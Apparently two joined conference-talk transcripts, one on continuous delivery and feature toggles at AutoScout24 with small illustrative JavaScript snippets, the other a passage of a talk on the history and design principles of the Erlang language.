What we're doing is still a big-bang release when we switch a feature toggle on, because the whole code that is behind the toggle — which can be quite a bit when you have big changes — goes live to all users at once. And we still need to deploy when we want to switch a toggle. What we want to do is use virtual canary birds. In the old days of coal mines, canary birds were used to detect poisonous gases in the mines, and the poor birds would fall to the ground before the miners even noticed that there were toxic gases in the air, so they could run when they saw the birds on the ground. This gives the name to the deployment strategy of canary releases, where you switch new features on only for a few users and you observe them. When they fall dead to the ground, you'd better switch back to your old version, and when they are happy, then you can go on and release to everybody else. What we also started doing is writing regression tests for both branches — for the toggle switched on and switched off — so that we can actually have both versions live without risk. And we want to separate the code release from the feature release, so that we can switch between the two versions without deployment. The idea is to go so far that the product owner can actually go to the live service, switch on the feature only for himself, do acceptance, and then switch it on for the desired group of users or for everybody. To start this, some clever colleagues of mine have developed this thing called FeatureBee. It's basically a central management of features: you can view and change the feature status. So this is an example screenshot. The first column would be features that are in development. The second one is the features that are switched on for the canaries. And the third one is active for all users.
So they're basically done — live for everybody. To select the canaries, you have certain filters: they can be filtered by country or by browser and browser version, or you can assign a feature to a percentage of users, so this also goes towards A/B testing. There's also a browser plug-in where you can switch on a feature just for yourself, so that you can see for yourself whether it works or not. This is open source and on GitHub. It's implemented in .NET, but of course we welcome contributions for other platforms. Here's another example screenshot. A colleague of mine is currently migrating our back end to Go and Scala services, and they're deployed once the developers commit their code into the mainline. It looks pretty much like this, for example with this common service: as long as the background color of each of these services is green, everything's fine. Whenever it turns orange or red, there are problems behind it, and that signals where to check on that single individual service, to get it fixed and run the deployment again. It's our visual way to realize when everything is not running smoothly. It's as easy as that, but you have to keep it in mind and realize the moment something happens, with your tools. Okay, so we're developing in several teams on one code base. We have different features in one team in development at one time, and we want to release at any time. So we do not have a lockdown anymore, or a code freeze, and we do not have a phase where we can check the whole platform and see that everything's working. And we don't want to do rollbacks anymore — we always want to go forward. So all of this requires continuous quality as well. What does this mean for us?
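A toggle service in the spirit of the FeatureBee setup just described — though not its real API; every name here is invented — might combine explicit canary users with a percentage filter like this:

```javascript
// Stable bucket 0-99 per user id, so a given user is consistently in or
// out of a percentage rollout across requests.
function bucket(userId) {
  let h = 0;
  for (const ch of userId) h = (h * 31 + ch.charCodeAt(0)) % 100;
  return h;
}

const toggles = {
  newSearch: { state: "canary", canaries: new Set(["alice"]), percent: 0 },
};

function isEnabled(feature, userId) {
  const t = toggles[feature];
  if (!t) return false;
  if (t.state === "on") return true;               // live for everybody
  if (t.state === "canary") {
    return t.canaries.has(userId) || bucket(userId) < t.percent;
  }
  return false;                                    // still in development
}

console.log(isEnabled("newSearch", "alice")); // true  - explicit canary
console.log(isEnabled("newSearch", "bob"));   // false - not in the rollout
toggles.newSearch.state = "on";               // widen without a deployment
console.log(isEnabled("newSearch", "bob"));   // true
```

The point of the design is the last step: promoting a feature from canary to everybody is a state change, not a deployment.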
It starts with pair programming. The two teams that have been working on the garage portal have developed all production code in pairs from the beginning. This not only means four eyes for high quality, but also includes know-how transfer, and we really discovered the fun of working this way. Pair programming also has another advantage over the classical code review: when you work in the way of developing, committing and then doing the code review, the code might go live between the commit or the push and the review. This is the testing pyramid. It's supposed to show what we test on which levels. The goal is high automation, of course, to have fast and repeatable feedback. The width of the pyramid shows the automated coverage, and of course we use TDD, so that no code is written that is untested. On the lowest level are unit and small component tests, which are supposed to have very high coverage, of course. Then we have regression tests, which test only our main use cases, but they also run continuously, so that we always know how the main use cases are doing. So far we've been using browser tests for that.
So, Selenium — which we've had quite a bit of pain with, in the sense that the tests are slow, because they run through browsers and through the network, and because we have quite a few brittle, flaky tests that are red although the functionality is actually working correctly. So what we're doing is trying to reduce the number of tests we have, remove the ones that are actually testing duplicates, and also go to a lower architecture level, where we test the business logic or the application logic directly instead of going through the browser all the time. The next level would be smoke tests. This is the part of the regression tests covering only the most important functionality, which we run after every delivery, so that we know that whenever we deliver to an environment, it's actually still working. One example would be that in the garage portal we always had problems with sending out emails. So now we have a smoke test that after every delivery says, okay, emails are still working, because this is very important for us. And above the pyramid, without automation, you still have manual regression and explorative tests, because no automation can substitute the intuition of a human, and our testers know pretty well which areas of the code are very critical, what has changed, and what the coders usually break. We also have these friendly gentlemen — we call them the cops, after the static code analysis tools: StyleCop, FxCop, ReSharper. We also use similar lint tools for JavaScript, for checking formatting and common errors and bugs. We also respect compiler warnings and treat compiler warnings as errors. It's all very annoying in the beginning, but once you get used to it, you have the advantage of a uniform formatting, so you can't really recognize who has written which piece of code, although developers all have their different styles of coding. And of course you avoid bugs from the beginning. Failures — oh, there's a question. The question is: when do we run the static code
analysis, is that correct? Okay. So I would say the actual continuous integration happens on the developer machine. Before you actually commit, you would run unit tests and static code analysis, so that you know at once if you've broken any of those. And of course it's run again on the continuous integration server. But it's actually important to have the feedback as quickly as possible, so you could even run it during coding time, at compile and unit test time. Okay, so let's give it a try again. Failures are of course a great chance to learn, to get better next time. And whenever a failure happens to the website, we do like this: the entire team stands up, gathers at the board that's located on our floor, and asks a few questions, and answers them as well. What happened? What's the impact? Who takes care of it? And when do we meet again to check if we were able to fix it? So that's part of our ownership: it's the teams who deliver software, it's the teams who are doing the releases. And even after getting it fixed, we get together again to ask the five whys — why, five times in a row — to find out the root cause of the failure. So it's all about teamwork. Once upon a time we had a release manager orchestrating a big, huge release task force to do our monthly releases, and for us this has become a fairy tale, because it's now the teams who are in charge of releasing. Each team is able to ship its software independently from the other teams, and we managed to improve our releases from five weeks to commit-to-live in less than an hour. And as Simon just pointed out, we do not have any rollbacks; we only go forward, with roll-forwards. So, is this annoying? Yes, it is. But if it hurts, do it more often, and you get trained to it.
That was our mantra back then, and so we did. There was another learning. When we achieved continuous live delivery, we learned a lot about flow, about improving flow, visualizing impediments and getting rid of them. That's why we tried to implement Kanban with a couple of teams instead of Scrum. Nowadays we do not have teams that follow the Scrum book, nor do they follow the Kanban book — they do anything in between; you could call it Scrum-ban, okay? But we realized that whenever you try to improve any kind of flow, there will be impact on other flows as well. Okay, so to show you that we're not inventing things: this is a screenshot from the beginning of the week. It's the live delivery build, still in TeamCity, of the garage portal that I was talking about. So what can you see here? You can see a few things. You can see, for example, that right here we had a gap of — what is it — seven days without a delivery. So of course you can ask yourself: he's talking about continuous delivery, is this continuous delivery? You can see here that a live delivery broke, but we actually fixed it an hour later — well, no, it's actually, what is it, a few minutes anyway. This is more the roll-forward scenario: try to fix it quickly, be able to fix it quickly, so you don't have to go back. What else can we see? There's one day, the 28th of April, where we actually went live three times a day. So that's possible too. Now, of course, you can ask: is this continuous delivery? I don't like the big break in there either; probably we were doing server patches, because unfortunately we don't have that included in our delivery pipeline yet. So it could certainly be a lot better, and there are still quite a few things that can be improved. For us it is important to be able to go live when we want to. Now, what can still be improved, what are we working on?
AutoScout24 turned 15 last year, and the vehicle market is a big application. What you often have in these cases is a big monolith, and it used to be released in one big bang, as we heard before, which of course prevents teams from working independently and releasing independently. So what we're working on is splitting up this monolith into separate components that can be developed and released independently, and that single teams can take responsibility for. Of course you have to watch out: it's not all done by splitting it up into a separate code base and pulling up a release pipeline for it. There are of course hidden dependencies, and you have to figure them out and manage them, and we've tripped over a few of them. Another thing is DevOps. We've been working in interdisciplinary teams, but operations is basically still a separate department, and of course ops and devs have by definition different interests: developers want to change as much as possible, as quickly as possible, and ops want to change as little as possible, of course, because of the stability of the platform. But our goal is to have one team responsible for release and operation of their product — you build it, you run it. And of course that needs competence on the team for server configuration, automation, monitoring and all these things. What we have now is that one developer in the team has a DevOps role, so he has additional rights on the live platform and acts as a link to the ops department. What is missing is that basically every developer has that role and has the rights to deliver, but also the obligation to watch out, to monitor and to run the thing. So let me tell you a long story about our so-called user sign-up bug. Users can sign up on our page for free — there's no charge — and about 10,000 users a day do so. But several weeks ago, about 10,000 users signed up and were not able to sign in after signing up. So what happened?
The sign-up data was written to the database — check — but unfortunately to the wrong table. And even worse, we did not realize it, because back then we only monitored operations data, operations KPIs like bugs, latency, performance. And it took us very, very long hours to realize that there was a big, important bug live on our platform. The teams were blinded; they did not check, after they released, whether users would be able to sign in after they signed up. Today we do have screens that look like this, that show business KPIs — in this case the correlation of sign-ups and sign-ins. We could have noticed this bug way earlier if we had had that TV screen with the correlation of sign-ups and sign-ins. So monitoring is not only about operations data. It's also about business and business KPIs, to find out if something happened on your platform after you released. And it's crucial if you want to release frequently, as often as possible, whenever it's done, whenever you want. It's all about flow, about getting things to your customers again and again and again. Okay, any more questions? Yes, please. So you're talking about the iOS one — continuous delivery. Okay, so the question is: we also have apps on iOS and Android, so how do you do continuous delivery for those? Well, you can't really do it. On Android you can probably deliver quite fast, but to get through the Apple App Store takes a few days at least. So you can't really deliver to your users a few times a day, but you should still be able to respect the principles behind it — continuous integration, always being able to deliver, and doing roll-forwards and these things. It's indeed a bit faster with Android, but you can't deliver an app whenever you want, that's true. Any other questions? Yes, there's one over there on the right-hand side. Actually, not that I would be aware of — we were asked whether we blog about it, but to be honest, good point.
No — yeah, we want to start a blog to share more of our learnings, but we haven't done so yet, so I'm afraid I can't really tell you anything about it. But I can give you my card and you can ask me directly afterwards, or via mail. Okay. Yes, there's another one. I'm going to guess that's yours — the question is about how to deal with caching. So the answer is basically: we are crap at caching, and that's why we're not talking about it. But thanks for asking. Any other questions? Yeah, there's one there. Okay, the question is: do you have background services, do you load-balance them and blue-green deploy them? So you mean like running background services? Yes, we have them. No, we do not blue-green deploy them. Why not? Because we can just take them offline and start them up again, and no user would notice any impact, for the most part. Okay, more questions. Yes, up there, and down there afterwards. Yeah, so there's sort of a process where we'd say, okay, we want to go live now. This might be handled differently in every team, but normally during the stand-up in the morning we say, okay, we want to go live as soon as possible, and a developer or a tester would push a new version to the acceptance test environment and look over it. He would know, because he's working with the team, what has changed, and he might either say, okay, I have seen that all the regression tests are green, or check a few things manually and then say, okay, this is ready to go live. So there's no hundred percent certainty that everything's working, but the idea is working closely together and knowing all the time what's going on. What we also do: when we have an acceptance test environment that is green, in the sense that all the regression tests agree and a tester has said, okay, I've looked it over and it's fine —
it automatically goes live. Does this help? It looks like I'm facilitating your questions now. Okay, the question is about the tooling for the deployment. What we use is TeamCity and Rake, and I think Rake also starts some PowerShell scripts. There's nothing else to it. We used to have an archaic tool — was it called Refleweb? I don't know if anybody knows it — that was a big pain, and we got rid of it as soon as possible after the one who really wanted it left the company. Okay, yes, I guess one last question. Yeah, okay, the question is how much time we have spent on implementing all this. That's a good question. I can tell you: a lot, at least in terms of mental cost and motivation, to just get it done — in terms of investing the time. But in terms of real cost — do you need a number, a figure? No, I think it's really hard to tell. Okay, so as all of this is part of developing, of getting a story done, I guess — but that's only a rough guess — it's around 25 to 30 percent per user story, which is, depending on the size of a story, up to three to four days, maybe only hours. But if you're talking in terms of the investment that you have to make to get this, I think you actually save time, because before, we had one week of release, and we wasted one week of time, basically. So now this is all faster, and as soon as it's gotten into people's heads and into the process, you're actually faster and you save time. It's quite a good example to show that it pays off later in the day. Okay, there's one last question up there.
Yes, so the question is about big architectural refactorings and branching. So yes, we do still avoid branching. We try to split things up into little chunks that can go live one by one. We might do branches, but only for trying things out locally, and then we do not merge them back; we avoid branches at all costs, basically. Now, of course we do have architectural changes, and the splitting up of the monolith that I was talking about is a really big architectural change. When you have these big things, you really have to think about them. You can't just say, okay, put in a feature toggle and a migrating serializer and that's it. You really have to plan them ahead and split them up into small chunks. That's all I can really say in a general way about it, but if you want to discuss specific scenarios, feel free to come down afterwards and we can see what experience we have. So I guess, Simon, we would be happy to — I think we have like three more minutes to take questions. Yeah, that's right. Yeah, up there. The question is about monitoring tools, what we use. Do you want to give an answer? Most of them with us are self-made. I just can't remember the name of the tool, but it may pop up in a second. How about AutoScout? We try not to build our own, so we have Splunk running, but we're not very happy with the monitoring solutions we have at the moment, so we are actually looking for stuff that works better.
I think we have PRTG, and then we have something else, but I think we're on our way to finding something else — I can't remember right now, but we can check after the presentation if you're interested. But I think you should be able to find stuff that is widely used and adopted, with good plugins and visualization, without building things on your own. We might have built some plugin to probe some stuff in our database so that we can display it, but that's all. Yep. Okay, so the question is what we think is important to monitor, is that correct? So I think the most important thing to monitor is really what your business is about. As Robert showed earlier, if it's important for you that users can actually sign in and sign up, then you should monitor that, and you should really be aware of it at all times. We do not monitor values like "is a value in the database correct" or "is a certain service up and running correctly". It's more important to actually have your business KPIs in view, because anything that breaks those really means you have to take action. Everything else is second priority. Okay, any other questions? Any more questions about caching or stuff we did not talk about? I know nobody's perfect. Things, or blogging — I don't know, maybe we'll expose ourselves in some other ways. No? Okay. We can have lunch together if you want. Thanks for listening and for the good questions, and enjoy making your releases small and predictable.
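As a closing aside on the monitoring point from earlier in the talk: the business-KPI check — watching the correlation of sign-ups and sign-ins — could be as simple as a ratio alarm. The threshold here is invented; the point is only that the check is about the business, not the servers.

```javascript
// Alert when sign-ins collapse relative to sign-ups - the situation in
// the sign-up bug story, where users signed up but could not sign in.
function signInAlarm(signUps, signIns, threshold = 0.5) {
  if (signUps === 0) return false;        // nothing to correlate yet
  return signIns / signUps < threshold;   // true means: raise an alert
}

console.log(signInAlarm(10000, 9500)); // false - healthy correlation
console.log(signInAlarm(10000, 200));  // true  - sign-ins collapsed
```

Wired to a dashboard, a check like this would have flagged the wrong-table bug within hours instead of after "very, very long hours" of looking at operations KPIs.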
We want feedback - fast and often. This requires quick and frequent high-quality releases. But how do you do that with a platform that 10 teams are working on? Can you do without branches? How do you keep up with testing? And database changes...? This is a look behind the scenes of AutoScout24 - a pan-European online market place - that makes continuous delivery possible with agile methods.
10.5446/50632 (DOI)
Okay, it's time. Shall we start then? Yeah, so I'm Robert Virding. Thank you, the fan club. I currently work for Erlang Solutions. We provide training and consulting around the language Erlang and building systems with Erlang. I was originally a theoretical physicist, doing physics at Stockholm University, and the physics department got their own computer, and seeing I was a postgraduate, I had more or less free access to that. And after a while the physics department decided I should go do something else, because I wasn't doing any physics — doing a lot of programming, though, but no physics. So I started working for Ericsson, originally for a small group managing Ericsson's VAX VMS computers in the Stockholm area. That's how long ago it was. Then I started working, again at Ericsson, in the Computer Science Lab, where amongst other things we developed Erlang. We were trying to do a lot of things in the Computer Science Lab, actually trying to introduce new technology which we thought would be useful for Ericsson. So that's where most of this work was done. The name, the title — "Wherefore art thou Erlang" — that's of course a play on Shakespeare, and "wherefore" does not mean "where". It's old English and it means "why". If you're speaking Swedish or Norwegian, it's "varför". Why Erlang? That's what I'm going to try and explain. I'll start off with a bit about concurrency versus parallelism. There are a lot of definitions of what is concurrency and what is parallelism. Some people equate them, some don't. I prefer the view that parallelism is something your system provides: it gives you the possibility of doing things at the same time in the system — multicore, many nodes, or whatever it might be. Whereas concurrency, that's a property of either your problem or your solution to the problem: you want to divide things up into little bits that communicate with each other.
One does not entail the other. You can of course run a system that's very concurrent on a non-parallel system, and you can run extremely sequential code on a parallel system, which of course is a waste of time. So much for parallelism and concurrency. We'll start off with just a little bit of history. One of the things we were doing in the lab was trying to help Ericsson solve a problem — a problem we perceived that they had. They had a switch called the AXE, which was a very good switch. There was nothing wrong with it, and it made Ericsson a ton of money; it was a very successful product. But it was costly and it was difficult to maintain. So one of the things we tried to do in the lab was to look at how we could simplify the cost of development and the maintenance of the AXE. That is actually a real picture. That's what telephone exchanges looked like back in the old days when you had wires. A large exchange might have 100,000 connections coming in, so you've got at least 100,000 wires coming into the system, going somewhere, and you get enormous things like this. How they kept track of them, I have absolutely no idea. I know that you seldom moved anything — they put in a new cable instead, because they were never really certain where the other one went. Anyway, that's the problem. So what's the problem domain? What are the properties of this problem? This list is from our boss in the lab, Bjarne Däcker, from his thesis. There are a number of things that are typical of this type of application, telephone exchanges, and some of them are quite natural. For example, the bottom one here: we have to have a large number of concurrent activities. And we were thinking of large telephone exchanges, where you might have 100,000 connections coming in, so you might have tens of thousands of calls going on at the same time, plus other things going on in the switch.
That's why I thought it was so funny a few years ago when the C10K problem came up — how do you solve C10K? That's something we'd been considering as a small system when we were starting this work about 20 years ago. Until you get to 100,000, it's not really interesting; anyone can do that. You have other things like timing constraints: things need to be performed at a certain time and shouldn't take more than a certain time. You need distribution — we'll talk a bit more about that. If you want a fault-tolerant system, you need at least two computers, so you need some form of distribution mechanism in the system. It's got complex functionality. You need software maintenance: the system should not go down; you should not have to take the system down, ever. That's the goal. The goal is you buy it, you run it for 30 years, then you change it afterwards. And any maintenance you need to do, you do while the system is running. You should not need to take things down. Fault tolerance: again, you should not need to take the system down, but the system should never crash. You're going to get errors — just accept that fact. You're going to get errors, but the system should be designed in such a way that it can handle errors, clean up and recover from errors afterwards. So these are a lot of the properties of telephone exchanges, and this was the type of application we were looking at. These were our goals: how do we design a language or a system for doing this? This is me, hard at work — actually, this is work. Two things. If you look in the middle at the back there, behind the screen, you'll see a small box. That was a small exchange, a PABX, we had in our lab which we could experiment with.
So we had hacked that and connected it to our VAX computer, so we could control that small exchange from the computer, which means we could experiment with controlling it, writing telecoms applications on our large computer and actually running them against the hardware. That was quite an interesting experience, because the hardware does funny things and requires funny things occasionally, so we had to get it right. The train set, that was for an exhibition we were going to take part in. For one week we were going to stand there and try to present Erlang to people, and we wanted something — how do you get people interested enough to come and look at what you're doing? And whatever you might think of that little telephone exchange at the back, it's not very interesting to look at. I think it had one light, which went on when you turned the power on. That's it. It doesn't blink, it doesn't do anything. So we thought: a train set. It's a Märklin train set, and we were actually controlling it from Erlang. We made a train control system in which you could run trains, and it would stop things and everything like this. It was actually very fail-safe, because if something went wrong it just stopped everything — so never any crashes on it. Yeah, that's that. This was about '91, I think, somewhere around there. I've actually still got the software left, bits of the train as well. Now, a bit of philosophy about what was going on here — what we were trying to do and how we were thinking — and a couple of reflections we made. Erlang was developed iteratively. We had this goal, what we were trying to do. It was Joe Armstrong, sitting up at the front here, who started it, asking: how do you program telephony? How do you set up calls and things like this? We started off running this on top of Prolog, which is very sequential.
So you can set up a system for making calls and then you can make a call and that's fine. Then of course you want to make two calls and three calls and four calls etc. Then you start having to get into thinking how am I going to do this concurrently, right? How can I program this in a nice way to get the natural concurrency in the system? So then you start working on this. And this was developed very iteratively. We had a user group who were in another part of Ericsson and they were doing an architecture study and they wanted a language to prototype their architectures in. So we started working together. We provided a language for them and they came back with feedback on the language, on how good and how bad features were, etc. etc. And it was a very successful collaboration in that sense. But some things are important to note here. We were not trying to implement a functional language. Erlang is now a functional language. That's been true, well, since it more or less was complete, but we did not set out to implement a functional language. It became a functional language. We started off as a logic language. It became a functional language in the end. We were not out trying to implement the actor model. Okay, so we found out later, at least I had never heard of the actor model while we were doing this work. We found out later when someone said, yeah, oh, Erlang implements the actor model? I said, oh, yeah? So I go out and try and find out what the actor model is. And yes, it does. It does implement the actor model. And yes, it is a functional language, right? But that's not where we were going. That was not our goal with this. Our goal was this. We were trying to solve the problem. So the focus was on solving the problems, designing a language and a system for programming this type of application. That was the goal of the whole thing. It became functional. It became, well, the actor model.
Because these were ways we thought were very good, very good ways of trying to solve this problem. So that's why we were doing this type of thing. Also, this was actually very good in another sense in that it kept the focus on what we were trying to do. So we were trying to solve this problem. We weren't trying to implement a cool language. We were trying to solve this problem. And what happened was that our ideas went into making the language. We then got feedback on whether they were good ideas or bad ideas, how they needed to be modified, et cetera, et cetera. We put things in which we found afterwards were totally useless, so we could remove them because they weren't solving this problem. So we weren't trying to design a cool language; we were trying to make a language and a system to solve the problem. I think that's very important when you look at Erlang. It also makes it much easier because you can sometimes, well, avoid a lot of crap that comes in because people think it's cool. Yeah, it might be cool, but if it wasn't helpful for the problem, it went out again. That's one reason why the language and the system are very small. Yeah, as we were developing the language, we arrived at a number of basic principles and requirements of a system for doing this. So the language itself, yes, but it was also a system. It wasn't just a language. It was about the whole system, the libraries, and the environment for working and everything like this. And we had a number of features which we felt were necessary for the system to be able to handle. Otherwise, it wasn't interesting. So you needed lightweight, massive concurrency. That was just a base requirement of the system. You're running processes, you need process isolation. Things are going to go wrong. Processes are going to crash. If a process crashes, it cannot affect another process. That's just it. I mean, you can't have it any other way.
So here we're talking processes. We're not talking threads. Threads interact with each other. They can affect each other directly. Processes can't. You need primitives for handling fault tolerance. In the same way as the concurrency was a fundamental part of the problem, so was the fault tolerance. If you could not build a fault-tolerant system on top of this, it wasn't interesting. That's it. You needed primitives for continuous evolution of the system. You had to be able to handle, for example, not just changing the configuration, but even upgrading code while the system was running. So you needed primitives for doing this. You needed primitives for distribution. As I mentioned, if you wanted to make a truly fault-tolerant system, you needed at least two computers, which means you have to have some way of handling distribution of the application, the problem, between these computers. That's just all there is to it. Soft real time. So in the telecoms world, yes, you do have these timing constraints, but they're not hard real time in the sense that if you run over occasionally, it's not too bad as long as it doesn't happen too often. So we call this soft real time. Real real-time people don't call this real time. For them, if you don't do something in time, it's an error. We'd say, yeah, just as long as it doesn't happen too often. We wanted a safe language. Safe if we're comparing to, say, something like C, where you can just follow pointers off to hell somewhere and crash the system. We wanted a simple language. Simple in the sense that you have a small number of basic principles which you can build on top of. You don't want to have 50 of them, to keep adding new stuff at the base level all the time because you need something else. That means you got it wrong. So we wanted a small set of basic principles. And if you get them right, you can make a very powerful language which is simple. So in this case, small is good.
And I think that's one of the things we've actually managed to do. We'll see later the basics in the language are very, very few and they're very simple, but with them you can program very complex systems, very complex functionality. Another one we found was to provide tools for building the system, not solutions. If you try to provide solutions, they're either very limited, because you're providing for a specific type of problem, or if you want to make something that's very general, it becomes extremely complex, lots of different options and parameters and stuff like that, and basically it's very difficult to use. And we also found that when we did try to provide solutions, we usually got them wrong anyway, right? Because our view of what the problem was just didn't fit in with reality. So provide the basic tools for building things on top, in the language, and let people build the more specific cases in their application. It also allows them to handle different things in different ways, even in the same application, depending on exactly what they want in that case. So these were things that came out of our work when we were working with Erlang. Yeah, so where did we end up? So what's the Erlang way in this case? I'm not going to give that many code examples here. So there's a sequential side of the language and it is a simple functional language. It truly is. The syntax is a bit different, but most functional languages have different syntax. Whether you're programming Haskell or programming F#, the syntax is different. And you're always going to get complaints asking why doesn't it look like something typical that uses semicolons and curly braces? That usually just doesn't fit. It's a safe language, yes, no pointer errors. It is reasonably high level, actually; it was then and still is in many ways.
It's a simple functional language with a lot of stuff in it. It's dynamically typed. There is no static type system. It's strongly typed, but it is dynamically typed. All type checking is done at runtime. This was partially where we came from and also because it makes dynamic code loading easier. And there are no user-defined data types in the system. There are a fixed number of data types you can use to build things with. Again, this also reflects back on dynamic code handling. If you had user-defined types with dynamic code handling, you might have to define new types in the system on the fly while the system is running, and everything else might have to be recompiled to fit those, and that would just not work. So, yeah, typical features of a functional language: yes, it's immutable data. Again, this is standard fare for most functional languages. It's immutable data. We have immutable variables, so Erlang variables can't be changed; they just reference the data. We use pattern matching everywhere. Pattern matching is different, but it's an extremely practical way of doing things and makes very nice, concise, and very clear code. And we don't have loops, so recursion rules. That's just it. Nothing strange. Again, this is nothing strange. So this is one of the two syntax examples I've got here. So, yeah, we're using pattern matching. These are just two functions that step down over lists. And you'll see here the top one, inc list, that takes a list of numbers and returns a new list where it's incremented every element of that list. And you can see here it's in two parts. They're separated by a semicolon. I don't have a pen here, I'm afraid. They're separated by a semicolon and they're two separate clauses. And we're using pattern matching in the head, the bit on the left-hand side of the arrow, to choose the clause. So if we're saying the argument is a list with an element, we take the first clause and pull the list apart.
And we build a new list and call ourselves recursively to process the rest of the list. If it's not a list with an element, the argument is the empty list. Yeah? If you have like 100,000 entries in the list, will that actually allocate, you know, 100,000 lists? It rebuilds, it completely rebuilds the list. Oh, wow. That's fast. Yes. It's fast. You want it. Trust me. You want it. You want immutable data. Immutable data solves an awful lot of problems, right? Shared data is evil. You want immutable data. Yeah, so this is just stepping down the list. And the same thing with member. That just tests if an element is a member of a list. And you've got three cases. Yes, the list has elements and this is the first element. Therefore, we say true, yes. If it's not that, we check the rest of the list until we've hit the end of the list and we say false. So, yeah. The thing here is, if none of these clauses matches, you get an exception. Okay? There are no default values, no default case or anything like this. You get an exception which crashes things. That's good. Trust me. That's good. This is done by design. We have a few other fun constructs in. I like this one. Binaries. So we have a binary data structure. A binary is just an array of bytes which, of course, is extremely unsexy. It's about as uncool as you can get. But the interface is very nice. We have an interface that allows you to build and access elements by declaratively specifying what the structure looks like. So this binary structure here between the double arrows describes an IP packet. So we say the IP version, that's four bits. There's a four-bit header length field. There's an 8-bit service type. There's a 16-bit total packet size field. There's a 16-bit ID field. There's a three-bit flag field, et cetera, et cetera. We're describing what this packet looks like in a declarative fashion. Yeah?
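The list functions and the IP-header binary just described might look roughly like this in Erlang. This is a sketch reconstructed from the description, not the actual slide code; the module name `demo` and the exact field names in `decode_ip/1` are assumptions.

```erlang
-module(demo).
-export([inc/1, member/2, decode_ip/1]).

%% Increment every element of a list: two clauses chosen by
%% pattern matching in the head, recursion instead of a loop.
inc([H|T]) -> [H + 1 | inc(T)];
inc([])    -> [].

%% Test list membership: three cases, no default clause.
%% A non-list argument raises a function_clause exception.
member(X, [X|_]) -> true;
member(X, [_|T]) -> member(X, T);
member(_, [])    -> false.

%% Pull an IPv4 header apart declaratively with the binary syntax.
%% (Field names and bit widths follow the talk's description.)
decode_ip(<<Version:4, HdrLen:4, ServiceType:8, TotalSize:16,
            ID:16, Flags:3, FragOffset:13, TTL:8, Protocol:8,
            Checksum:16, SrcIP:32, DestIP:32, Rest/binary>>) ->
    {Version, HdrLen, ServiceType, TotalSize, ID, Flags,
     FragOffset, TTL, Protocol, Checksum, SrcIP, DestIP, Rest}.
```

The same `<< ... >>` syntax works in both directions: on the right-hand side it constructs a binary, and as a pattern it takes one apart.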
The constructs for creating them, the syntax, is that built into the language or is it macro-based? The question was whether this syntax is built into the language. It's built into the language. This is a built-in data type in the language and there are constructs for building them and matching them and pulling them apart. And this syntax here can both be used to construct a binary packet, so used on the right-hand side, I'm building one, and if I'm using it as a pattern, I'm actually testing and pulling something apart. So yeah, you can do this in C. But compare how much code that is to writing it here. And the system does it for you. And it actually does it very efficiently as well. So yes. I just like that one. It's a very nice example of using binaries. So at the same time as we're talking about a very high-level language, we're talking about a language which has very nice primitives for looking at the low level as well. So you'll find some people using Erlang so they can get at this easy way of building and pulling apart packets of data that come in. Handling something like a TCP packet is much the same, so using Erlang to look at protocols is much easier. Another feature is we don't do defensive programming. Right? We just don't. We try to avoid it anyway. You write your program for the case that everything works. If something goes wrong, you generate an exception. We let the system generate an exception for you to crash things. That's it. It takes a bit of getting used to. You're used to trying to always detect errors and handle errors. We don't. We'll just do everything as if it works. If something goes wrong, we'll crash the process. We'll see later how we handle that. That makes a lot of code much easier. If you've ever written code which does serious error handling, that's a lot of effort.
There's a lot of code to do it. We can avoid most of that straight off. Concurrency. This is a quote from Mike Williams, who is the third person in the original team. It was Joe, it was Mike, it was me who did most of the original work around Erlang. Later more people came in and did the other nice features as well. And if you want to make an efficient concurrent language, you need three things that have to go fast. Right? It has to be fast to create processes. Processes are going to come and go all the time. It has to be fast to create processes. You have a lot of processes. There's going to be a lot of context switching. So context switching has to be fast. And also communication between the processes has to be fast. So if you're going to build a system which uses processes, concurrency in this form, these three things have to be fast. Otherwise, it's not practical. So where did we end up on the concurrency bit? Lightweight processes, yes. So tens of thousands of processes, easy. Hundreds of thousands, now it's getting interesting. Millions of processes, perfectly feasible to do. And there are actually products running that have millions of Erlang processes in the system. So we're not talking operating system processes here. We're implementing our own processes inside the Erlang system. Operating system processes are just too heavy, both too big and too heavy, and everything like this just wouldn't be practical. We use processes for everything in Erlang, not just to model concurrency. We use them for managing state, which gets down to the bottom one here. There is no global data in the system. If you want state somewhere, you generally have a process managing that state. Even if your state is in an external database, you will have a process that talks to that database and manages that. So there are a lot of processes there. Processes are isolated.
This is in the sense that the only way to communicate between processes is by sending messages. I cannot go and look at the data of another process and I cannot, especially, go and modify the data of another process. That's it. That means that when a process crashes or terminates, it will not affect anyone else. We won't get things like bad data spreading in the system or anything like this. So the only way of communicating between processes is by sending messages. And again here, we provide the basics, the low-level basics. It's a simple asynchronous message passing facility we have. You have a process. I can send a message to it. That's an asynchronous send. Then at the other end, we have a selective receive which allows a process to get at the messages that have been sent to it. This idea of a selective receive is very nice because it definitely limits the combinatorial explosion you can get in non-deterministic systems, because you can never really be certain who is going to send us what and when. If I didn't have this facility, I might end up having to be able to handle every message that could be sent to me everywhere, which is not what you want to do. Selective receive allows us to be very selective about what I'm interested in now and to ignore everything else for the time being. And using these very simple mechanisms, you can build more complex message handling constructs on top. So when you want, say, synchronous communication, it's two messages. You send a message to the server and then you sit and wait for a reply. It does something, then sends a reply message back. That's easy. It's nice. Well, why not include that in the system from the start? The trouble is it's very simple until you have to actually start handling errors and working out what happens when things go wrong, right? So I send a message to another process. I don't get a reply back. What should I do?
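As a concrete illustration, here is one way to build a synchronous call, with one possible answer to the no-reply question (a timeout), out of nothing but spawn, asynchronous send, and selective receive. The module name `sync_call` and the message shapes are invented for the example; this is a sketch, not library code.

```erlang
-module(sync_call).
-export([start/0, call/2]).

%% A tiny server process: sits in a receive loop and replies
%% to {call, From, Ref, Request} messages.
start() ->
    spawn(fun loop/0).

loop() ->
    receive
        {call, From, Ref, Request} ->
            From ! {reply, Ref, {ok, Request}},
            loop()
    end.

%% Synchronous communication built from two asynchronous messages:
%% send, then selectively receive the matching reply. The timeout
%% is our own policy -- nothing in the language imposes one.
call(Server, Request) ->
    Ref = make_ref(),                     % unique tag for this call
    Server ! {call, self(), Ref, Request},
    receive
        {reply, Ref, Result} -> Result    % only the matching reply
    after 5000 ->
        {error, timeout}
    end.
```

Because the receive matches on the unique reference, any unrelated messages already in the mailbox are simply left alone.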
